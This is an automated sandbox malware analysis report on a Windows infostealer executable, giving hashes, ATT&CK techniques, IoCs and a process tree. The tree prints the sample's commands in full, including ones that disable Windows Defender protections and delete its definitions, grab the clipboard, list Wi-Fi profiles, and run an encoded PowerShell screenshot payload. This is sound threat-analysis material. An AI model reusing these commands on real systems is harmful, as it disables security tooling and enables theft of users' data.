5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5

Analysis

max time kernel
93s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
28-12-2024 19:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe
Size

7.5MB
MD5

092a2139247c8dc3ad3e0cee5e165eb2
SHA1

e6114cda9ed839a52bbecdd49f4e34ef49031bf2
SHA256

5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5
SHA512

6a5065701c8d426b9e2f35b24df2179cdbc4a45fd9628f014b05a11bed51b1c0fed70174a3f39edf78a1a2a0fb55c3674e399961c207a9161c44f7f901f91099
SSDEEP

196608:+mhhO8YurErvI9pWjg/Qc+4o673pNrabeSyzWtPMYnNcsY:VxYurEUWjZZ4dDLIehzWtPTNzY

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4992	powershell.exe
1320	powershell.exe
4476	powershell.exe
2020	powershell.exe
2316	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4488	cmd.exe
4908	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
872	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe
2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe
2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe
2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe
2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe
2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe
2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe
2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe
2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe
2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe
2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe
2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe
2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe
2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe
2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe
2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe
2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
17	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
3580	tasklist.exe
2108	tasklist.exe
2300	tasklist.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023c85-21.dat	upx
behavioral2/memory/2752-25-0x00007FFCCBBF0000-0x00007FFCCC2B5000-memory.dmp	upx
behavioral2/memory/2752-29-0x00007FFCDF600000-0x00007FFCDF625000-memory.dmp	upx
behavioral2/files/0x0007000000023c78-28.dat	upx
behavioral2/files/0x0007000000023c83-30.dat	upx
behavioral2/memory/2752-32-0x00007FFCE0800000-0x00007FFCE080F000-memory.dmp	upx
behavioral2/files/0x0007000000023c7e-47.dat	upx
behavioral2/files/0x0007000000023c7f-48.dat	upx
behavioral2/files/0x0007000000023c7d-46.dat	upx
behavioral2/files/0x0007000000023c7c-45.dat	upx
behavioral2/files/0x0007000000023c7b-44.dat	upx
behavioral2/files/0x0007000000023c7a-43.dat	upx
behavioral2/files/0x0007000000023c79-42.dat	upx
behavioral2/files/0x0007000000023c77-41.dat	upx
behavioral2/files/0x0007000000023c8a-40.dat	upx
behavioral2/files/0x0007000000023c89-39.dat	upx
behavioral2/files/0x0007000000023c88-38.dat	upx
behavioral2/files/0x0007000000023c84-35.dat	upx
behavioral2/files/0x0007000000023c82-34.dat	upx
behavioral2/memory/2752-54-0x00007FFCDEF80000-0x00007FFCDEFAD000-memory.dmp	upx
behavioral2/memory/2752-56-0x00007FFCDC210000-0x00007FFCDC22A000-memory.dmp	upx
behavioral2/memory/2752-58-0x00007FFCDB8E0000-0x00007FFCDB904000-memory.dmp	upx
behavioral2/memory/2752-60-0x00007FFCDB670000-0x00007FFCDB7EF000-memory.dmp	upx
behavioral2/memory/2752-64-0x00007FFCDF770000-0x00007FFCDF77D000-memory.dmp	upx
behavioral2/memory/2752-62-0x00007FFCDC1F0000-0x00007FFCDC209000-memory.dmp	upx
behavioral2/memory/2752-66-0x00007FFCDB520000-0x00007FFCDB553000-memory.dmp	upx
behavioral2/memory/2752-73-0x00007FFCCB6C0000-0x00007FFCCBBE9000-memory.dmp	upx
behavioral2/memory/2752-74-0x00007FFCDF600000-0x00007FFCDF625000-memory.dmp	upx
behavioral2/memory/2752-71-0x00007FFCDB380000-0x00007FFCDB44D000-memory.dmp	upx
behavioral2/memory/2752-70-0x00007FFCCBBF0000-0x00007FFCCC2B5000-memory.dmp	upx
behavioral2/memory/2752-76-0x00007FFCDB360000-0x00007FFCDB374000-memory.dmp	upx
behavioral2/memory/2752-79-0x00007FFCDC1C0000-0x00007FFCDC1CD000-memory.dmp	upx
behavioral2/memory/2752-78-0x00007FFCDEF80000-0x00007FFCDEFAD000-memory.dmp	upx
behavioral2/memory/2752-85-0x00007FFCDABB0000-0x00007FFCDACCA000-memory.dmp	upx
behavioral2/memory/2752-84-0x00007FFCDC210000-0x00007FFCDC22A000-memory.dmp	upx
behavioral2/memory/2752-86-0x00007FFCDB8E0000-0x00007FFCDB904000-memory.dmp	upx
behavioral2/memory/2752-181-0x00007FFCDB670000-0x00007FFCDB7EF000-memory.dmp	upx
behavioral2/memory/2752-295-0x00007FFCDB520000-0x00007FFCDB553000-memory.dmp	upx
behavioral2/memory/2752-311-0x00007FFCDB380000-0x00007FFCDB44D000-memory.dmp	upx
behavioral2/memory/2752-314-0x00007FFCCB6C0000-0x00007FFCCBBE9000-memory.dmp	upx
behavioral2/memory/2752-335-0x00007FFCCBBF0000-0x00007FFCCC2B5000-memory.dmp	upx
behavioral2/memory/2752-350-0x00007FFCDABB0000-0x00007FFCDACCA000-memory.dmp	upx
behavioral2/memory/2752-341-0x00007FFCDB670000-0x00007FFCDB7EF000-memory.dmp	upx
behavioral2/memory/2752-336-0x00007FFCDF600000-0x00007FFCDF625000-memory.dmp	upx
behavioral2/memory/2752-351-0x00007FFCCBBF0000-0x00007FFCCC2B5000-memory.dmp	upx
behavioral2/memory/2752-366-0x00007FFCCB6C0000-0x00007FFCCBBE9000-memory.dmp	upx
behavioral2/memory/2752-379-0x00007FFCDABB0000-0x00007FFCDACCA000-memory.dmp	upx
behavioral2/memory/2752-378-0x00007FFCDC1C0000-0x00007FFCDC1CD000-memory.dmp	upx
behavioral2/memory/2752-377-0x00007FFCDB360000-0x00007FFCDB374000-memory.dmp	upx
behavioral2/memory/2752-376-0x00007FFCDB380000-0x00007FFCDB44D000-memory.dmp	upx
behavioral2/memory/2752-375-0x00007FFCDB520000-0x00007FFCDB553000-memory.dmp	upx
behavioral2/memory/2752-374-0x00007FFCDF770000-0x00007FFCDF77D000-memory.dmp	upx
behavioral2/memory/2752-373-0x00007FFCDC1F0000-0x00007FFCDC209000-memory.dmp	upx
behavioral2/memory/2752-372-0x00007FFCDB670000-0x00007FFCDB7EF000-memory.dmp	upx
behavioral2/memory/2752-371-0x00007FFCDB8E0000-0x00007FFCDB904000-memory.dmp	upx
behavioral2/memory/2752-370-0x00007FFCDC210000-0x00007FFCDC22A000-memory.dmp	upx
behavioral2/memory/2752-369-0x00007FFCDEF80000-0x00007FFCDEFAD000-memory.dmp	upx
behavioral2/memory/2752-368-0x00007FFCE0800000-0x00007FFCE080F000-memory.dmp	upx
behavioral2/memory/2752-367-0x00007FFCDF600000-0x00007FFCDF625000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4312	cmd.exe
1720	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4360	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2928	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
1320	powershell.exe
4992	powershell.exe
1320	powershell.exe
2316	powershell.exe
4992	powershell.exe
4992	powershell.exe
2316	powershell.exe
2316	powershell.exe
4908	powershell.exe
4908	powershell.exe
468	powershell.exe
468	powershell.exe
4908	powershell.exe
468	powershell.exe
4476	powershell.exe
4476	powershell.exe
2164	powershell.exe
2164	powershell.exe
2020	powershell.exe
2020	powershell.exe
1664	powershell.exe
1664	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1320	powershell.exe
Token: SeDebugPrivilege	4992	powershell.exe
Token: SeDebugPrivilege	2316	powershell.exe
Token: SeDebugPrivilege	2108	tasklist.exe
Token: SeDebugPrivilege	3580	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4456	WMIC.exe
Token: SeSecurityPrivilege	4456	WMIC.exe
Token: SeTakeOwnershipPrivilege	4456	WMIC.exe
Token: SeLoadDriverPrivilege	4456	WMIC.exe
Token: SeSystemProfilePrivilege	4456	WMIC.exe
Token: SeSystemtimePrivilege	4456	WMIC.exe
Token: SeProfSingleProcessPrivilege	4456	WMIC.exe
Token: SeIncBasePriorityPrivilege	4456	WMIC.exe
Token: SeCreatePagefilePrivilege	4456	WMIC.exe
Token: SeBackupPrivilege	4456	WMIC.exe
Token: SeRestorePrivilege	4456	WMIC.exe
Token: SeShutdownPrivilege	4456	WMIC.exe
Token: SeDebugPrivilege	4456	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4456	WMIC.exe
Token: SeRemoteShutdownPrivilege	4456	WMIC.exe
Token: SeUndockPrivilege	4456	WMIC.exe
Token: SeManageVolumePrivilege	4456	WMIC.exe
Token: 33	4456	WMIC.exe
Token: 34	4456	WMIC.exe
Token: 35	4456	WMIC.exe
Token: 36	4456	WMIC.exe
Token: SeDebugPrivilege	2300	tasklist.exe
Token: SeDebugPrivilege	4908	powershell.exe
Token: SeDebugPrivilege	468	powershell.exe
Token: SeIncreaseQuotaPrivilege	4456	WMIC.exe
Token: SeSecurityPrivilege	4456	WMIC.exe
Token: SeTakeOwnershipPrivilege	4456	WMIC.exe
Token: SeLoadDriverPrivilege	4456	WMIC.exe
Token: SeSystemProfilePrivilege	4456	WMIC.exe
Token: SeSystemtimePrivilege	4456	WMIC.exe
Token: SeProfSingleProcessPrivilege	4456	WMIC.exe
Token: SeIncBasePriorityPrivilege	4456	WMIC.exe
Token: SeCreatePagefilePrivilege	4456	WMIC.exe
Token: SeBackupPrivilege	4456	WMIC.exe
Token: SeRestorePrivilege	4456	WMIC.exe
Token: SeShutdownPrivilege	4456	WMIC.exe
Token: SeDebugPrivilege	4456	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4456	WMIC.exe
Token: SeRemoteShutdownPrivilege	4456	WMIC.exe
Token: SeUndockPrivilege	4456	WMIC.exe
Token: SeManageVolumePrivilege	4456	WMIC.exe
Token: 33	4456	WMIC.exe
Token: 34	4456	WMIC.exe
Token: 35	4456	WMIC.exe
Token: 36	4456	WMIC.exe
Token: SeDebugPrivilege	4476	powershell.exe
Token: SeDebugPrivilege	2164	powershell.exe
Token: SeIncreaseQuotaPrivilege	4116	WMIC.exe
Token: SeSecurityPrivilege	4116	WMIC.exe
Token: SeTakeOwnershipPrivilege	4116	WMIC.exe
Token: SeLoadDriverPrivilege	4116	WMIC.exe
Token: SeSystemProfilePrivilege	4116	WMIC.exe
Token: SeSystemtimePrivilege	4116	WMIC.exe
Token: SeProfSingleProcessPrivilege	4116	WMIC.exe
Token: SeIncBasePriorityPrivilege	4116	WMIC.exe
Token: SeCreatePagefilePrivilege	4116	WMIC.exe
Token: SeBackupPrivilege	4116	WMIC.exe
Token: SeRestorePrivilege	4116	WMIC.exe
Token: SeShutdownPrivilege	4116	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4544 wrote to memory of 2752	4544	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	83
PID 4544 wrote to memory of 2752	4544	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	83
PID 2752 wrote to memory of 4180	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	84
PID 2752 wrote to memory of 4180	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	84
PID 2752 wrote to memory of 4172	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	85
PID 2752 wrote to memory of 4172	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	85
PID 2752 wrote to memory of 3776	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	88
PID 2752 wrote to memory of 3776	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	88
PID 4180 wrote to memory of 4992	4180	cmd.exe	90
PID 4180 wrote to memory of 4992	4180	cmd.exe	90
PID 4172 wrote to memory of 2316	4172	cmd.exe	91
PID 4172 wrote to memory of 2316	4172	cmd.exe	91
PID 3776 wrote to memory of 1320	3776	cmd.exe	92
PID 3776 wrote to memory of 1320	3776	cmd.exe	92
PID 2752 wrote to memory of 2412	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	93
PID 2752 wrote to memory of 2412	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	93
PID 2752 wrote to memory of 3584	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	94
PID 2752 wrote to memory of 3584	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	94
PID 2412 wrote to memory of 3580	2412	cmd.exe	97
PID 2412 wrote to memory of 3580	2412	cmd.exe	97
PID 2752 wrote to memory of 1316	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	98
PID 2752 wrote to memory of 1316	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	98
PID 2752 wrote to memory of 4488	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	99
PID 2752 wrote to memory of 4488	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	99
PID 3584 wrote to memory of 2108	3584	cmd.exe	101
PID 3584 wrote to memory of 2108	3584	cmd.exe	101
PID 2752 wrote to memory of 4960	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	103
PID 2752 wrote to memory of 4960	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	103
PID 2752 wrote to memory of 4572	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	105
PID 2752 wrote to memory of 4572	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	105
PID 2752 wrote to memory of 4312	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	106
PID 2752 wrote to memory of 4312	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	106
PID 2752 wrote to memory of 2572	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	108
PID 2752 wrote to memory of 2572	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	108
PID 2752 wrote to memory of 1292	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	111
PID 2752 wrote to memory of 1292	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	111
PID 4488 wrote to memory of 4908	4488	cmd.exe	114
PID 4488 wrote to memory of 4908	4488	cmd.exe	114
PID 1316 wrote to memory of 4456	1316	cmd.exe	115
PID 1316 wrote to memory of 4456	1316	cmd.exe	115
PID 2572 wrote to memory of 2928	2572	cmd.exe	116
PID 2572 wrote to memory of 2928	2572	cmd.exe	116
PID 4960 wrote to memory of 2300	4960	cmd.exe	117
PID 4960 wrote to memory of 2300	4960	cmd.exe	117
PID 4572 wrote to memory of 4956	4572	cmd.exe	118
PID 4572 wrote to memory of 4956	4572	cmd.exe	118
PID 4312 wrote to memory of 1720	4312	cmd.exe	120
PID 4312 wrote to memory of 1720	4312	cmd.exe	120
PID 1292 wrote to memory of 468	1292	cmd.exe	119
PID 1292 wrote to memory of 468	1292	cmd.exe	119
PID 2752 wrote to memory of 3524	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	121
PID 2752 wrote to memory of 3524	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	121
PID 3524 wrote to memory of 2216	3524	cmd.exe	123
PID 3524 wrote to memory of 2216	3524	cmd.exe	123
PID 2752 wrote to memory of 368	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	124
PID 2752 wrote to memory of 368	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	124
PID 368 wrote to memory of 4964	368	cmd.exe	126
PID 368 wrote to memory of 4964	368	cmd.exe	126
PID 2752 wrote to memory of 1128	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	127
PID 2752 wrote to memory of 1128	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	127
PID 1128 wrote to memory of 656	1128	cmd.exe	129
PID 1128 wrote to memory of 656	1128	cmd.exe	129
PID 2752 wrote to memory of 540	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	130
PID 2752 wrote to memory of 540	2752	5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe	130

C:\Users\Admin\AppData\Local\Temp\5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe
"C:\Users\Admin\AppData\Local\Temp\5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4544
- C:\Users\Admin\AppData\Local\Temp\5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe
  "C:\Users\Admin\AppData\Local\Temp\5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4180
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\5765b1b30a81226b2eb4096d3340d61e9f41ffcf5b909a60286304c186e671e5.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4172
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3776
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2412
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3584
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1316
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:4488
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4960
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4572
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:4312
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2572
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACA